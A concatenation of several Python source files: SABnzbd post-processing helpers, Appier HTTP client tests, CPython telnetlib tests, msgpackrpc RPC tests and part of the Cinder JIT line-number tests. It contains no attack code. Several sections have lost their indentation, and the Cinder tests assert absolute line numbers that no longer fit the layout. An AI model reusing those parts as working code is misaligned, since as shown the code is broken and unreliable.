        sabnzbd.save_state()
        notifier.send_notification("SABnzbd", T("Queue finished"), "queue_done")

        # Perform end-of-queue action when one is set
        if sabnzbd.QUEUECOMPLETEACTION:
            logging.info(
                "Queue has finished, launching: %s (%s)", sabnzbd.QUEUECOMPLETEACTION, sabnzbd.QUEUECOMPLETEARG
            )
            if sabnzbd.QUEUECOMPLETEARG:
                sabnzbd.QUEUECOMPLETEACTION(sabnzbd.QUEUECOMPLETEARG)
            else:
                # Run without argument in a thread so the PP loop is not blocked
                Thread(target=sabnzbd.QUEUECOMPLETEACTION).start()
            sabnzbd.change_queue_complete_action(cfg.queue_complete(), new=False)
def cleanup_list(wdir, skip_nzb):
    """ Remove all files whose extension matches the cleanup list,
    optionally ignoring the nzb extension

    Recurses into subdirectories; removal errors are logged but do
    not abort the sweep (deliberate best-effort behaviour).
    """
    if cfg.cleanup_list():
        try:
            files = os.listdir(wdir)
        except:
            files = ()
        for filename in files:
            path = os.path.join(wdir, filename)
            if os.path.isdir(path):
                cleanup_list(path, skip_nzb)
            else:
                if on_cleanup_list(filename, skip_nzb):
                    try:
                        logging.info("Removing unwanted file %s", path)
                        remove_file(path)
                    except:
                        logging.error(T("Removing %s failed"), clip_path(path))
                        logging.info("Traceback: ", exc_info=True)
        if files:
            # If directories only contained unwanted files, remove them
            cleanup_empty_directories(wdir)
def prefix(path, pre):
    """ Apply prefix to last part of path
    '/my/path' and 'hi_' will give '/my/hi_path'
    """
    parent, leaf = os.path.split(path)
    return os.path.join(parent, "%s%s" % (pre, leaf))
def nzb_redirect(wdir, nzbname, pp, script, cat, priority):
    """ Check if this job contains only NZB files,
    if so send to queue and remove if on clean-up list
    Returns list of processed NZB's, or None when other files are present
    """
    files = recursive_listdir(wdir)

    # Bail out as soon as anything other than an NZB file is found
    for file_ in files:
        if os.path.splitext(file_)[1].lower() != ".nzb":
            return None

    # For multiple NZBs, cannot use the current job name
    if len(files) != 1:
        nzbname = None

    # Process all NZB files
    for nzb_file in files:
        dirscanner.process_single_nzb(
            os.path.split(nzb_file)[1],
            # BUG FIX: was `file_` (stale variable from the check-loop above),
            # which made every call re-process the same file when the job
            # contained more than one NZB
            nzb_file,
            pp,
            script,
            cat,
            priority=priority,
            keep=False,
            dup_check=False,
            nzbname=nzbname,
        )
    return files
def one_file_or_folder(folder):
    """ If the dir only contains one file or folder, join that file/folder onto the path """
    # Iterative descent instead of recursion: keep following
    # single-entry directories until a file or a multi-entry dir
    while os.path.isdir(folder):
        try:
            entries = os.listdir(folder)
        except OSError:
            # Can occur on paths it doesn't like, for example "C:"
            break
        if len(entries) != 1:
            break
        folder = os.path.join(folder, entries[0])
    return folder
TAG_RE = re.compile(r"<[^>]+>")


def get_last_line(txt):
    """ Return last non-empty line of a text, trim to 150 max """
    # Strip HTML tags in a rudimentary way first
    plain = TAG_RE.sub(" ", txt)
    # Walk backwards and take the first line that has content
    last = ""
    for candidate in reversed(plain.split("\n")):
        stripped = candidate.strip("\r\t ")
        if stripped:
            last = stripped
            break
    if len(last) >= 150:
        last = last[:147] + "..."
    return last
def remove_samples(path):
    """ Remove all files that match the sample pattern
    Skip deleting if it matches all files or there is only 1 file
    """
    files_to_delete = []
    nr_files = 0
    for root, _dirs, files in os.walk(path):
        for file_to_match in files:
            nr_files += 1
            if RE_SAMPLE.search(file_to_match):
                files_to_delete.append(os.path.join(root, file_to_match))

    # Make sure we skip false-positives: if every file matched,
    # the "sample" pattern is probably part of the job name itself
    if len(files_to_delete) < nr_files:
        # FIX: loop variable renamed; it used to shadow the `path` parameter
        for sample_path in files_to_delete:
            try:
                logging.info("Removing unwanted sample file %s", sample_path)
                remove_file(sample_path)
            except:
                logging.error(T("Removing %s failed"), clip_path(sample_path))
                logging.info("Traceback: ", exc_info=True)
    else:
        logging.info("Skipping sample-removal, false-positive")
def rename_and_collapse_folder(oldpath, newpath, files):
    """ Rename folder, collapsing when there's just a single subfolder
    oldpath --> newpath OR oldpath/subfolder --> newpath
    Modify list of filenames accordingly

    Returns the rewritten list of file paths pointing into newpath.
    """
    orgpath = oldpath
    items = globber(oldpath)
    if len(items) == 1:
        folder = items[0]
        folder_path = os.path.join(oldpath, folder)
        # DVD layout folders must keep their parent, so never collapse them
        if os.path.isdir(folder_path) and folder not in ("VIDEO_TS", "AUDIO_TS"):
            logging.info("Collapsing %s", os.path.join(newpath, folder))
            oldpath = folder_path

    oldpath = os.path.normpath(oldpath)
    newpath = os.path.normpath(newpath)
    files = [os.path.normpath(f).replace(oldpath, newpath) for f in files]

    renamer(oldpath, newpath)
    try:
        # When collapsed, the original (now empty) parent can be removed
        remove_dir(orgpath)
    except:
        pass
    return files
def set_marker(folder):
    """ Set marker file and return name

    Creates an empty marker file (configured via cfg.marker_file) in
    *folder*. Returns the marker name, or None when creation failed
    or no marker is configured.
    """
    name = cfg.marker_file()
    if name:
        path = os.path.join(folder, name)
        logging.debug("Create marker file %s", path)
        try:
            # Context manager guarantees the handle is closed even on error
            with open(path, "w"):
                pass
        except:
            logging.info("Cannot create marker file %s", path)
            logging.info("Traceback: ", exc_info=True)
            name = None
    return name
def del_marker(path):
    """ Remove marker file """
    # Nothing to do when no marker was set or it is already gone
    if not path or not os.path.exists(path):
        return
    logging.debug("Removing marker file %s", path)
    try:
        remove_file(path)
    except:
        logging.info("Cannot remove marker file %s", path)
        logging.info("Traceback: ", exc_info=True)
def remove_from_list(name, lst):
    """ Remove the first entry of *lst* that ends with *name*, in place """
    if not name:
        return
    for idx, entry in enumerate(lst):
        if entry.endswith(name):
            logging.debug("Popping %s", entry)
            del lst[idx]
            return
def try_alt_nzb(nzo):
    """ Try to get a new NZB if available

    Indexers can attach a "failure" URL to a job; when the user has
    enabled new_nzb_on_failure, that URL is queued as a fresh download.
    """
    url = nzo.nzo_info.get("failure")
    if url and cfg.new_nzb_on_failure():
        sabnzbd.add_url(url, nzo.pp, nzo.script, nzo.cat, nzo.priority)
|
http.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Hive Appier Framework
# Copyright (c) 2008-2021 Hive Solutions Lda.
#
# This file is part of Hive Appier Framework.
#
# Hive Appier Framework is free software: you can redistribute it and/or modify
# it under the terms of the Apache License as published by the Apache
# Foundation, either version 2.0 of the License, or (at your option) any
# later version.
#
# Hive Appier Framework is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
#
# You should have received a copy of the Apache License along with
# Hive Appier Framework. If not, see <http://www.apache.org/licenses/>.
__author__ = "João Magalhães <joamag@hive.pt>"
""" The author(s) of the module """
__version__ = "1.0.0"
""" The version of the module """
__revision__ = "$LastChangedRevision$"
""" The revision number of the module """
__date__ = "$LastChangedDate$"
""" The last change date of the module """
__copyright__ = "Copyright (c) 2008-2021 Hive Solutions Lda."
""" The copyright for the module """
__license__ = "Apache License, Version 2.0"
""" The license for the module """
import unittest
import threading
import appier
class HTTPTest(unittest.TestCase):
def setUp(self):
unittest.TestCase.setUp(self)
self.httpbin = appier.conf("HTTPBIN", "httpbin.org")
def test_parse_url(self):
url, scheme, host, authorization, params = appier.http._parse_url("http://hive.pt/")
self.assertEqual(url, "http://hive.pt:80/")
self.assertEqual(scheme, "http")
self.assertEqual(host, "hive.pt")
self.assertEqual(authorization, None)
self.assertEqual(params, {})
url, scheme, host, authorization, params = appier.http._parse_url("http://username@hive.pt/")
self.assertEqual(url, "http://hive.pt:80/")
self.assertEqual(scheme, "http")
self.assertEqual(host, "hive.pt")
self.assertEqual(authorization, None)
self.assertEqual(params, {})
url, scheme, host, authorization, params = appier.http._parse_url("http://username:password@hive.pt/")
self.assertEqual(url, "http://hive.pt:80/")
self.assertEqual(scheme, "http")
self.assertEqual(host, "hive.pt")
self.assertEqual(authorization, "dXNlcm5hbWU6cGFzc3dvcmQ=")
self.assertEqual(params, {})
url, scheme, host, authorization, params = appier.http._parse_url("http://username:password@hive.pt/hello/world")
self.assertEqual(url, "http://hive.pt:80/hello/world")
self.assertEqual(scheme, "http")
self.assertEqual(host, "hive.pt")
self.assertEqual(authorization, "dXNlcm5hbWU6cGFzc3dvcmQ=")
self.assertEqual(params, {})
url, scheme, host, authorization, params = appier.http._parse_url("http://username:password@hive.pt/hello/world?hello=world")
self.assertEqual(url, "http://hive.pt:80/hello/world")
self.assertEqual(scheme, "http")
self.assertEqual(host, "hive.pt")
self.assertEqual(authorization, "dXNlcm5hbWU6cGFzc3dvcmQ=")
self.assertEqual(params, dict(hello = ["world"]))
def test_redirect(self):
_data, response = appier.get(
"https://%s/redirect-to" % self.httpbin ,
params = dict(url = "https://%s/" % self.httpbin),
handle = True,
redirect = True
)
code = response.getcode()
self.assertNotEqual(code, 302)
self.assertEqual(code, 200)
quoted = appier.legacy.quote("https://%s/" % self.httpbin)
_data, response = appier.get(
"https://%s/redirect-to?url=%s" % (self.httpbin, quoted),
handle = True,
redirect = True
)
code = response.getcode()
self.assertNotEqual(code, 302)
self.assertEqual(code, 200)
_data, response = appier.get(
"https://%s/relative-redirect/2" % self.httpbin ,
handle = True,
redirect = True
)
code = response.getcode()
self.assertNotEqual(code, 302)
self.assertEqual(code, 200)
def test_timeout(self):
self.assertRaises(
BaseException,
lambda: appier.get(
"https://%s/delay/3" % self.httpbin,
handle = True,
redirect = True,
timeout = 1
)
)
data, response = appier.get(
"https://%s/delay/1" % self.httpbin,
handle = True,
redirect = True,
timeout = 30
)
code = response.getcode()
self.assertEqual(code, 200)
self.assertNotEqual(len(data), 0)
self.assertNotEqual(data, None)
def test_get_f(self):
file = appier.get_f("https://%s/image/png" % self.httpbin)
self.assertEqual(file.file_name, "default")
self.assertEqual(file.mime, "image/png")
self.assertEqual(len(file.data) > 100, True)
self.assertEqual(len(file.data_b64) > 100, True)
file = appier.get_f(
"https://%s/image/png" % self.httpbin,
name = "dummy"
)
self.assertEqual(file.file_name, "dummy")
self.assertEqual(file.mime, "image/png")
self.assertEqual(len(file.data) > 100, True)
self.assertEqual(len(file.data_b64) > 100, True)
def test_generator(self):
def text_g(message = [b"hello", b" ", b"world"]):
yield sum(len(value) for value in message)
for value in message:
yield value
data, response = appier.post(
"https://%s/post" % self.httpbin,
data = text_g(),
handle = True,
reuse = False
)
code = response.getcode()
self.assertNotEqual(code, 302)
self.assertEqual(code, 200)
self.assertEqual(data["data"], "hello world")
    def test_file(self):
        """POST a file-like object (BytesIO) and verify the echoed body."""
        data, response = appier.post(
            "https://%s/post" % self.httpbin,
            data = appier.legacy.BytesIO(b"hello world"),
            handle = True,
            reuse = False
        )
        code = response.getcode()
        self.assertNotEqual(code, 302)
        self.assertEqual(code, 200)
        self.assertEqual(data["data"], "hello world")
def test_multithread(self):
threads = []
results = []
for index in range(10):
result = dict()
results.append(result)
def generate(index):
def caller():
data, response = appier.get(
"https://%s/ip" % self.httpbin,
handle = True
)
result = results[index]
result["data"] = data
result["response"] = response
return caller
callable = generate(index)
thread = threading.Thread(target = callable, name = "TestMultithread")
thread.start()
threads.append(thread)
for thread, result in zip(threads, results):
thread.join()
response = result["response"]
code = response.getcode()
self.assertNotEqual(code, 302)
self.assertEqual(code, 200)
def test_error(self):
self.assertRaises(
appier.HTTPError,
lambda: appier.get("https://%s/status/404" % self.httpbin)
)
def test_invalid(self):
self.assertRaises(
BaseException,
lambda: appier.get("https://invalidlargedomain.org/")
)
|
test_telnetlib.py | import socket
import selectors
import telnetlib
import threading
import contextlib
from test import support
import unittest
HOST = support.HOST
def server(evt, serv):
    """Minimal one-shot TCP server used as a thread target by setUp.

    Starts listening on *serv*, signals readiness through *evt*, accepts a
    single connection (closing it at once) and always closes the listening
    socket; an accept timeout is swallowed silently.
    """
    serv.listen()
    evt.set()
    try:
        try:
            conn, _addr = serv.accept()
        except socket.timeout:
            pass
        else:
            conn.close()
    finally:
        serv.close()
class GeneralTests(unittest.TestCase):
    """Connection/timeout tests running telnetlib.Telnet against a local
    one-shot server (see the module-level ``server`` helper)."""

    def setUp(self):
        self.evt = threading.Event()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(60)  # Safety net. Look issue 11812
        self.port = support.bind_port(self.sock)
        self.thread = threading.Thread(target=server, args=(self.evt, self.sock))
        # fixed: Thread.setDaemon() is deprecated (Python 3.10+); assign
        # the `daemon` attribute directly instead.
        self.thread.daemon = True
        self.thread.start()
        self.evt.wait()

    def tearDown(self):
        self.thread.join()
        del self.thread  # Clear out any dangling Thread objects.

    def testBasic(self):
        # connects
        telnet = telnetlib.Telnet(HOST, self.port)
        telnet.sock.close()

    def testContextManager(self):
        with telnetlib.Telnet(HOST, self.port) as tn:
            self.assertIsNotNone(tn.get_socket())
        # leaving the `with` block must have closed the connection
        self.assertIsNone(tn.get_socket())

    def testTimeoutDefault(self):
        # the module default timeout is picked up at connect time
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(30)
        try:
            telnet = telnetlib.Telnet(HOST, self.port)
        finally:
            socket.setdefaulttimeout(None)
        self.assertEqual(telnet.sock.gettimeout(), 30)
        telnet.sock.close()

    def testTimeoutNone(self):
        # None, having other default
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(30)
        try:
            telnet = telnetlib.Telnet(HOST, self.port, timeout=None)
        finally:
            socket.setdefaulttimeout(None)
        self.assertTrue(telnet.sock.gettimeout() is None)
        telnet.sock.close()

    def testTimeoutValue(self):
        telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
        self.assertEqual(telnet.sock.gettimeout(), 30)
        telnet.sock.close()

    def testTimeoutOpen(self):
        telnet = telnetlib.Telnet()
        telnet.open(HOST, self.port, timeout=30)
        self.assertEqual(telnet.sock.gettimeout(), 30)
        telnet.sock.close()

    def testGetters(self):
        # Test telnet getter methods
        telnet = telnetlib.Telnet(HOST, self.port, timeout=30)
        t_sock = telnet.sock
        self.assertEqual(telnet.get_socket(), t_sock)
        self.assertEqual(telnet.fileno(), t_sock.fileno())
        telnet.sock.close()
class SocketStub(object):
    ''' a socket proxy that re-defines sendall() '''

    def __init__(self, reads=()):
        # Copy so recv() never mutates the caller's sequence.
        self.reads = list(reads)
        self.writes = []
        self.block = False

    def sendall(self, data):
        # Record instead of transmitting.
        self.writes.append(data)

    def recv(self, size):
        """Replay queued chunks, returning at most *size* bytes; surplus
        bytes are pushed back for the next call."""
        pieces = []
        received = 0
        while self.reads and received < size:
            piece = self.reads.pop(0)
            pieces.append(piece)
            received += len(piece)
        out = b''.join(pieces)
        if received > size:
            self.reads.insert(0, out[size:])
            out = out[:size]
        return out
class TelnetAlike(telnetlib.Telnet):
    # Telnet variant for offline testing: no real fd, no-op close(), and
    # availability driven by the SocketStub's `block` flag.
    def fileno(self):
        # there is no real file descriptor behind the stub socket
        raise NotImplementedError()
    def close(self): pass
    def sock_avail(self):
        # data is "available" whenever the stub is not blocking
        return (not self.sock.block)
    def msg(self, msg, *args):
        # capture debug output into self._messages for later inspection
        with support.captured_stdout() as out:
            telnetlib.Telnet.msg(self, msg, *args)
        self._messages += out.getvalue()
        return
class MockSelector(selectors.BaseSelector):
    """Selector double: readiness is dictated by the stub socket's flag."""

    def __init__(self):
        self.keys = {}

    @property
    def resolution(self):
        # fixed millisecond resolution; precision is irrelevant here
        return 1e-3

    def register(self, fileobj, events, data=None):
        entry = selectors.SelectorKey(fileobj, 0, events, data)
        self.keys[fileobj] = entry
        return entry

    def unregister(self, fileobj):
        return self.keys.pop(fileobj)

    def select(self, timeout=None):
        # The first registered TelnetAlike decides whether we "block".
        blocked = next(
            (fobj.sock.block for fobj in self.keys
             if isinstance(fobj, TelnetAlike)),
            False,
        )
        if blocked:
            return []
        return [(entry, entry.events) for entry in self.keys.values()]

    def get_map(self):
        return self.keys
@contextlib.contextmanager
def test_socket(reads):
    """Temporarily monkey-patch socket.create_connection so it hands out a
    SocketStub preloaded with *reads*; the original is always restored.

    Despite the ``test_`` prefix this is a helper, not a test case.
    """
    def fake_create_connection(*ignored):
        return SocketStub(reads)
    saved = socket.create_connection
    socket.create_connection = fake_create_connection
    try:
        yield None
    finally:
        socket.create_connection = saved
def test_telnet(reads=(), cls=TelnetAlike):
    ''' return a telnetlib.Telnet object that uses a SocketStub with
    reads queued up to be read

    Note: despite the ``test_`` prefix this is a factory helper, not a
    test case.
    '''
    # the stub only understands bytes chunks
    for x in reads:
        assert type(x) is bytes, x
    with test_socket(reads):
        telnet = cls('dummy', 0)
        telnet._messages = '' # debuglevel output
    return telnet
class ExpectAndReadTestCase(unittest.TestCase):
    # Base class that swaps telnetlib's selector for MockSelector so the
    # read/expect tests never touch a real file descriptor.
    def setUp(self):
        self.old_selector = telnetlib._TelnetSelector
        telnetlib._TelnetSelector = MockSelector
    def tearDown(self):
        # restore the real selector so other tests are unaffected
        telnetlib._TelnetSelector = self.old_selector
class ReadTests(ExpectAndReadTestCase):
    """Exercise the Telnet read_* API family against queued stub data."""

    def test_read_until(self):
        """
        read_until(expected, timeout=None)
        test the blocking version of read_util
        """
        want = [b'xxxmatchyyy']
        telnet = test_telnet(want)
        data = telnet.read_until(b'match')
        self.assertEqual(data, b'xxxmatch', msg=(telnet.cookedq, telnet.rawq, telnet.sock.reads))

        reads = [b'x' * 50, b'match', b'y' * 50]
        expect = b''.join(reads[:-1])
        telnet = test_telnet(reads)
        data = telnet.read_until(b'match')
        self.assertEqual(data, expect)

    def test_read_all(self):
        """
        read_all()
        Read all data until EOF; may block.
        """
        reads = [b'x' * 500, b'y' * 500, b'z' * 500]
        expect = b''.join(reads)
        telnet = test_telnet(reads)
        data = telnet.read_all()
        self.assertEqual(data, expect)
        return

    def test_read_some(self):
        """
        read_some()
        Read at least one byte or EOF; may block.
        """
        # test 'at least one byte'
        telnet = test_telnet([b'x' * 500])
        data = telnet.read_some()
        self.assertTrue(len(data) >= 1)
        # test EOF
        telnet = test_telnet()
        data = telnet.read_some()
        self.assertEqual(b'', data)

    def _read_eager(self, func_name):
        """
        read_*_eager()
        Read all data available already queued or on the socket,
        without blocking.
        """
        want = b'x' * 100
        telnet = test_telnet([want])
        func = getattr(telnet, func_name)
        telnet.sock.block = True
        self.assertEqual(b'', func())
        telnet.sock.block = False
        data = b''
        while True:
            try:
                data += func()
            except EOFError:
                break
        self.assertEqual(data, want)

    def test_read_eager(self):
        # read_eager and read_very_eager make the same guarantees
        # (they behave differently but we only test the guarantees)
        self._read_eager('read_eager')
        self._read_eager('read_very_eager')
        # NB -- we need to test the IAC block which is mentioned in the
        # docstring but not in the module docs

    def test_read_very_lazy(self):
        # BUGFIX: this method was named `read_very_lazy`, so unittest
        # discovery silently skipped it; the `test_` prefix makes it run.
        want = b'x' * 100
        telnet = test_telnet([want])
        self.assertEqual(b'', telnet.read_very_lazy())
        while telnet.sock.reads:
            telnet.fill_rawq()
        data = telnet.read_very_lazy()
        self.assertEqual(want, data)
        self.assertRaises(EOFError, telnet.read_very_lazy)

    def test_read_lazy(self):
        want = b'x' * 100
        telnet = test_telnet([want])
        self.assertEqual(b'', telnet.read_lazy())
        data = b''
        while True:
            try:
                read_data = telnet.read_lazy()
                data += read_data
                if not read_data:
                    telnet.fill_rawq()
            except EOFError:
                break
        self.assertTrue(want.startswith(data))
        self.assertEqual(data, want)
class nego_collector(object):
    """Option-negotiation callback that records every (cmd, opt) pair it
    sees and, on SE, drains pending subnegotiation data via *sb_getter*."""

    def __init__(self, sb_getter=None):
        self.seen = b''
        self.sb_getter = sb_getter
        self.sb_seen = b''

    def do_nego(self, sock, cmd, opt):
        self.seen = self.seen + cmd + opt
        # at subnegotiation end, collect the buffered SB payload
        if cmd == tl.SE and self.sb_getter:
            self.sb_seen += self.sb_getter()
tl = telnetlib
class WriteTests(unittest.TestCase):
    '''The only thing that write does is replace each tl.IAC for
    tl.IAC+tl.IAC'''
    def test_write(self):
        # samples cover: no IAC, a single IAC, consecutive IACs, an IAC
        # alone, and the empty payload
        data_sample = [b'data sample without IAC',
                       b'data sample with' + tl.IAC + b' one IAC',
                       b'a few' + tl.IAC + tl.IAC + b' iacs' + tl.IAC,
                       tl.IAC,
                       b'']
        for data in data_sample:
            telnet = test_telnet()
            telnet.write(data)
            written = b''.join(telnet.sock.writes)
            # every IAC byte must have been doubled on the wire
            self.assertEqual(data.replace(tl.IAC,tl.IAC+tl.IAC), written)
class OptionTests(unittest.TestCase):
    """Option negotiation (RFC 854/855) and debug-message plumbing."""
    # RFC 854 commands
    cmds = [tl.AO, tl.AYT, tl.BRK, tl.EC, tl.EL, tl.GA, tl.IP, tl.NOP]
    def _test_command(self, data):
        """ helper for testing IAC + cmd """
        telnet = test_telnet(data)
        data_len = len(b''.join(data))
        nego = nego_collector()
        telnet.set_option_negotiation_callback(nego.do_nego)
        txt = telnet.read_all()
        cmd = nego.seen
        self.assertTrue(len(cmd) > 0) # we expect at least one command
        self.assertIn(cmd[:1], self.cmds)
        self.assertEqual(cmd[1:2], tl.NOOPT)
        # nothing may be lost: payload plus negotiated bytes add up
        self.assertEqual(data_len, len(txt + cmd))
        nego.sb_getter = None # break the nego => telnet cycle
    def test_IAC_commands(self):
        for cmd in self.cmds:
            self._test_command([tl.IAC, cmd])
            self._test_command([b'x' * 100, tl.IAC, cmd, b'y'*100])
            self._test_command([b'x' * 10, tl.IAC, cmd, b'y'*10])
        # all at once
        self._test_command([tl.IAC + cmd for (cmd) in self.cmds])
    def test_SB_commands(self):
        # RFC 855, subnegotiations portion
        send = [tl.IAC + tl.SB + tl.IAC + tl.SE,
               tl.IAC + tl.SB + tl.IAC + tl.IAC + tl.IAC + tl.SE,
               tl.IAC + tl.SB + tl.IAC + tl.IAC + b'aa' + tl.IAC + tl.SE,
               tl.IAC + tl.SB + b'bb' + tl.IAC + tl.IAC + tl.IAC + tl.SE,
               tl.IAC + tl.SB + b'cc' + tl.IAC + tl.IAC + b'dd' + tl.IAC + tl.SE,
              ]
        telnet = test_telnet(send)
        nego = nego_collector(telnet.read_sb_data)
        telnet.set_option_negotiation_callback(nego.do_nego)
        txt = telnet.read_all()
        self.assertEqual(txt, b'')
        # doubled IACs inside SB...SE must collapse to a single IAC byte
        want_sb_data = tl.IAC + tl.IAC + b'aabb' + tl.IAC + b'cc' + tl.IAC + b'dd'
        self.assertEqual(nego.sb_seen, want_sb_data)
        self.assertEqual(b'', telnet.read_sb_data())
        nego.sb_getter = None # break the nego => telnet cycle
    def test_debuglevel_reads(self):
        # test all the various places that self.msg(...) is called
        given_a_expect_b = [
            # Telnet.fill_rawq
            (b'a', ": recv b''\n"),
            # Telnet.process_rawq
            (tl.IAC + bytes([88]), ": IAC 88 not recognized\n"),
            (tl.IAC + tl.DO + bytes([1]), ": IAC DO 1\n"),
            (tl.IAC + tl.DONT + bytes([1]), ": IAC DONT 1\n"),
            (tl.IAC + tl.WILL + bytes([1]), ": IAC WILL 1\n"),
            (tl.IAC + tl.WONT + bytes([1]), ": IAC WONT 1\n"),
            ]
        for a, b in given_a_expect_b:
            telnet = test_telnet([a])
            telnet.set_debuglevel(1)
            txt = telnet.read_all()
            # messages were captured by TelnetAlike.msg
            self.assertIn(b, telnet._messages)
        return
    def test_debuglevel_write(self):
        telnet = test_telnet()
        telnet.set_debuglevel(1)
        telnet.write(b'xxx')
        expected = "send b'xxx'\n"
        self.assertIn(expected, telnet._messages)
    def test_debug_accepts_str_port(self):
        # Issue 10695
        with test_socket([]):
            telnet = TelnetAlike('dummy', '0')
            telnet._messages = ''
        telnet.set_debuglevel(1)
        telnet.msg('test')
        self.assertRegex(telnet._messages, r'0.*test')
class ExpectTests(ExpectAndReadTestCase):
    def test_expect(self):
        """
        expect(expected, [timeout])
        Read until the expected string has been seen, or a timeout is
        hit (default is no timeout); may block.
        """
        want = [b'x' * 10, b'match', b'y' * 10]
        telnet = test_telnet(want)
        (_,_,data) = telnet.expect([b'match'])
        # the returned text covers everything read up to and including
        # the matching pattern (the trailing chunk stays queued)
        self.assertEqual(data, b''.join(want[:-1]))
if __name__ == '__main__':
unittest.main()
|
test_msgpackrpc.py | import threading
import unittest
import helper
import msgpackrpc
from msgpackrpc import inPy3k
from msgpackrpc import error
class TestMessagePackRPC(unittest.TestCase):
    """End-to-end tests driving a msgpackrpc server/client pair in-process."""

    class TestServer(object):
        # Methods exposed over RPC by the test server.
        def hello(self):
            return "world"

        def sum(self, x, y):
            return x + y

    def setUp(self):
        self._address = msgpackrpc.Address('localhost', helper.unused_port())

    def setup_env(self):
        """Start a server thread on the test address and return a connected
        client (also stored on self for tearDown)."""
        def _start_server(server):
            server.start()
            server.close()

        self._server = msgpackrpc.Server(TestMessagePackRPC.TestServer())
        self._server.listen(self._address)
        self._thread = threading.Thread(target=_start_server, args=(self._server,))
        self._thread.start()
        self._client = msgpackrpc.Client(self._address, unpack_encoding='utf-8')
        # fixed: dropped the stray C-style semicolons used throughout
        return self._client

    def tearDown(self):
        self._client.close()
        self._server.stop()
        self._thread.join()

    def test_call(self):
        client = self.setup_env()
        result = client.call('hello')
        self.assertEqual(result, "world", "'hello' result is incorrect")
        result = client.call('sum', 1, 2)
        self.assertEqual(result, 3, "'sum' result is incorrect")

    def test_call_async(self):
        client = self.setup_env()
        # fixed: local names were misspelled `feture1` / `feture2`
        future1 = client.call_async('hello')
        future2 = client.call_async('sum', 1, 2)
        future1.join()
        future2.join()
        self.assertEqual(future1.result, "world", "'hello' result is incorrect in call_async")
        self.assertEqual(future2.result, 3, "'sum' result is incorrect in call_async")

    def test_notify(self):
        client = self.setup_env()
        result = True
        try:
            client.notify('hello')
            client.notify('sum', 1, 2)
        except Exception:  # was a bare `except:`; keep the catch explicit
            result = False
        self.assertTrue(result)

    def test_unknown_method(self):
        client = self.setup_env()
        self.assertRaises(error.RPCError, lambda: client.call('unknown', True))
        try:
            client.call('unknown', True)
            self.assertTrue(False)
        except error.RPCError as e:
            message = e.args[0]
            self.assertEqual(message, "'unknown' method not found", "Error message mismatched")
if __name__ == '__main__':
unittest.main()
|
test_cinderjit.py | # Copyright (c) Facebook, Inc. and its affiliates. (http://www.facebook.com)
import _testcapi
import asyncio
import builtins
import dis
import gc
import sys
import tempfile
import threading
import types
import unittest
import warnings
import weakref
from compiler.consts import CO_SUPPRESS_JIT, CO_NORMAL_FRAME
from compiler.static import StaticCodeGenerator
from contextlib import contextmanager
from functools import cmp_to_key
from pathlib import Path
from textwrap import dedent
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore")
from .test_compiler.test_static.common import StaticTestBase
except ImportError:
from test_compiler.test_static.common import StaticTestBase
from contextlib import contextmanager
# cinderjit exists only on Cinder builds of CPython; everywhere else fall
# back to a no-op jit_suppress decorator so this module still imports.
try:
    import cinderjit
    from cinderjit import jit_suppress
except ImportError:  # fixed: was a bare `except:`, which also hid real errors
    cinderjit = None

    def jit_suppress(func):
        """No-op replacement used when the Cinder JIT is unavailable."""
        return func
class GetFrameLineNumberTests(unittest.TestCase):  # NOTE(review): these tests assert absolute f_lineno values (50, 59, 75, 99) tied to this file's exact layout — do not add or remove lines above or inside this class without updating the constants
    def assert_code_and_lineno(self, frame, func, lineno):  # frame must belong to func's code object and sit on `lineno`
        self.assertEqual(frame.f_code, func.__code__)
        self.assertEqual(frame.f_lineno, lineno)
    def test_line_numbers(self):
        """Verify that line numbers are correct"""
        @unittest.failUnlessJITCompiled
        def g():
            return sys._getframe()
        self.assert_code_and_lineno(g(), g, 50)  # 50 == file line of the `return` above in the original layout
    def test_line_numbers_for_running_generators(self):
        """Verify that line numbers are correct for running generator functions"""
        @unittest.failUnlessJITCompiled
        def g(x, y):
            yield sys._getframe()
            z = x + y
            yield sys._getframe()
            yield z
        initial_lineno = 59  # file line of the first `yield` above (original layout)
        gen = g(1, 2)
        frame = next(gen)
        self.assert_code_and_lineno(frame, g, initial_lineno)
        frame = next(gen)
        self.assert_code_and_lineno(frame, g, initial_lineno + 2)
        self.assertEqual(next(gen), 3)
    def test_line_numbers_for_suspended_generators(self):
        """Verify that line numbers are correct for suspended generator functions"""
        @unittest.failUnlessJITCompiled
        def g(x):
            x = x + 1
            yield x
            z = x + 1
            yield z
        gen = g(0)
        initial_lineno = 75  # presumably the frame's starting line before the first next() — tied to original layout
        self.assert_code_and_lineno(gen.gi_frame, g, initial_lineno)
        v = next(gen)
        self.assertEqual(v, 1)
        self.assert_code_and_lineno(gen.gi_frame, g, initial_lineno + 3)
        v = next(gen)
        self.assertEqual(v, 2)
        self.assert_code_and_lineno(gen.gi_frame, g, initial_lineno + 5)
    def test_line_numbers_during_gen_throw(self):
        """Verify that line numbers are correct for suspended generator functions when
        an exception is thrown into them.
        """
        @unittest.failUnlessJITCompiled
        def f1(g):
            yield from g
        @unittest.failUnlessJITCompiled
        def f2(g):
            yield from g
        gen1, gen2 = None, None
        gen1_frame, gen2_frame = None, None
        @unittest.failUnlessJITCompiled
        def f3():
            nonlocal gen1_frame, gen2_frame
            try:
                yield "hello"
            except TestException:  # NOTE(review): TestException is defined elsewhere in the original file
                gen1_frame = gen1.gi_frame
                gen2_frame = gen2.gi_frame
                raise
        gen3 = f3()
        gen2 = f2(gen3)
        gen1 = f1(gen2)
        gen1.send(None)
        with self.assertRaises(TestException):
            gen1.throw(TestException())
        initial_lineno = 99  # file line of `yield from g` in f1 (original layout)
        self.assert_code_and_lineno(gen1_frame, f1, initial_lineno)
        self.assert_code_and_lineno(gen2_frame, f2, initial_lineno + 4)
# Decorator factory: rebuild the decorated function so that it executes
# against the supplied globals dict instead of this module's globals.
def with_globals(gbls):
    def decorator(func):
        rebuilt = type(func)(
            func.__code__,
            gbls,
            func.__name__,
            func.__defaults__,
            func.__closure__,
        )
        rebuilt.__module__ = func.__module__
